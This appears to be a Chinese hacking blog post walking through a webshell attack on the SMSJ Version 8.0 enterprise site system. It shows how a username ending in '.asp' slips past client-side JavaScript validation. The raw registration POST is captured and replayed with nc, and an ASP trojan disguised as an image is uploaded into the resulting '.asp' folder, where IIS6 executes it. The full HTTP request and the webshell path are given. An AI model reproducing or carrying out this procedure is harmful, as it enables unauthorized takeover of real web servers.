dvbbs8.0漏洞:最新SMSJ  Version  8.0漏洞

作者:rover
帮朋友检测网站WebSite安全性是SMSJ Version 8.0号称仿阿里巴巴东西注册企业会员后登录管理发现上传图片会归类到个http://www.rover.com/UserDocument/你注册会员帐号/picture/目录里不由让人浮想联翩想起早期动易那个注册漏洞
说起这个漏洞完全是iis6引起在iis6站点上建立个xx.asp文件夹然后在里面放个改成g后缀asp木马照样会按asp来执行看了下服务器 8成是win2003,也就是iis6了然后我试着注册rover.asp用户注册那里到是过滤了特殊但是看了下只是用简单javascript限制
代码如下:
function checkdata {
( isNumberString(addform.user.value,"1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_")!=1 || addform.user.value.length<2 || addform.user.value.length>16) {
alert("\用户注册出错下面是产生可能原因:\n\n·用户名必须是2-16位数字、英文或下划线")
false;ok,抓包然后用nc提交直接绕过
抓包内容
POST /reg_save.asp HTTP/1.1
Accept: image/g, image/x-xbitmap, image/jpeg, image/pjpeg,

application/vnd.ms-powerpo, application/msword, application/x-shockwave-flash, */*
Referer: http://www.rover.com/reg.asp?action=reg
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;

.NET CLR 2.0.50727)
Host: www.rover.com
Content-Length: 230
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDASQCACRB=FELPBKLAJDFPOKOPFBDEKGMB; cnzz02=1; rtime=0;

ltime=1206546036500; cnzz_eid=96831333-

user=qazxc.asp&pass=1234567&pass1=1234567&ypxxone_id=8&ypxxtwo_id=136&coname=rover&colxr=a

dmin&colxrsex=%CF%C8%C9%FA&addone_id=17&addtwo_id=490&coaddress=xxxxx&cotelq=010&cotel=384

76564&[email protected]&vip=3&img.x=58&img.y=17
nc ip 80成功注册然后把asp木马改成g后缀当图片上传上去
http://www.rover.com/UserDocument/qazxc.asp/Picture/20080326.g
自此得到webshellover~最近懒说话懒得修饰文笔看不懂直跳过跳过...
ps:漏洞很简单好久不写字了纯粹憋字而已见笑了此外还可以本地提交注册



  • 篇文章: 图灵脚本解密开始

  • 篇文章: 推荐:Cookie注入是怎样产生
  • Tags:  nbsp什么意思 nbsp是什么意思 htmlnbsp dvbbs8.0漏洞

    延伸阅读

    最新评论

    发表评论